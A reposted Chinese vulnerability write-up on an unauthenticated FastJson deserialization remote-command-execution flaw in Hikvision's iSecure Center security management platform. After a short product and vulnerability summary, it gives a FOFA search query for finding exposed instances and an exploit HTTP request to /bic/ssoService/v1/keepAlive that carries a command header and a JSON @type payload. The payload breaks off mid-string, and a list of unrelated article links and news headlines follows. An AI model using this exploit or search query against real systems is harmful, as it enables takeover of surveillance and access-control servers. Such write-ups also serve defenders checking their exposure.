当前位置: 首页 > news >正文

海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞复现

0x01 产品简介

海康威视综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。海康威视集成化综合管理软件平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。

0x02 漏洞概述

由于海康威视综合安防管理平台使用了低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。

0x03 复现环境

FOFA:app="HIKVISION-iSecure-Center"

0x04 漏洞复现

Exp-1

POST /bic/ssoService/v1/keepAlive HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/json
cmd: dir

{"CTGT":{ "a": {"@type": "java.lang

相关文章:

  • 【介绍下什么是Kubernetes编排系统】
  • C语言操作符详解(二)
  • 数据库练习题
  • 颠沛流离学二叉树(完结撒花篇)
  • Linux路由设置
  • 数据结构笔记2 栈和队列
  • Windows 宿主机访问 VirtualBox 虚拟机中创建的 docker 容器中的 mysql8.0 的数据
  • 基于SpringBoot的装饰工程管理系统源码数据库
  • DevOps 安全集成:从开发到部署,全生命周期安全守护
  • htb_office
  • Android --- MVVM+DataBinding+Fragment+Retrofit+Adapter 简单示例
  • 提高篇(二):高级绘图技巧:在Processing中创造精美图形
  • docker镜像转移,mac Linux
  • 前端开发高频面试题
  • 基于深度学习的红外船舶检测识别分类完整实现数据集8000+张
  • 华为端云一体化开发 初始化云db表结构和表数据(实践2.0)(HarmonyOS学习第七课)
  • uc/OS移植到stm32实现三个任务
  • K8s Pod的QoS类
  • 【NetTopologySuite类库】生成凸包
  • 关于怎么用Cubemx生成的USBHID设备实现读取一体的鼠标键盘设备(改进版)
  • 机器人助力、入境游、演出引流:假期纳客千万人次城市有高招
  • 白俄罗斯政府代表团将访问朝鲜
  • 同路人才是真朋友——驻南苏丹使馆援助东赤道州人道主义物资交接仪式侧记
  • 莫斯科一机场实施临时限制措施
  • 体坛联播|拜仁遭绝平未能提前夺冠,刘翔钻石联赛纪录作古
  • 解放日报头版:上海张江模力社区托举“年轻的事业”